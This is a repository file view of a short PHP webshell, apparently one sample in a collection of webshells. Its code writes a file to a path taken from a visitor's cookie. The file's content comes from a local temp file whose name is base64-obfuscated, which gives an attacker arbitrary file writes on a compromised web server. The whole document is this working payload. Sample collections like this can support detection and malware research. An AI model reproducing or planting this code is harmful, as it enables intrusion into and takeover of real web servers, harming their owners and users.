webshell/php/20220213_04.php

3 lines
149 B
PHP
Raw Normal View History

2022-02-13 14:33:58 +00:00
<?php
if(@$_COOKIE['path'] != ""){file_put_contents($_COOKIE['path'], base64_decode(file_get_contents(base64_decode("L3RtcC90bXA0RTE1LnRtcA=="))));}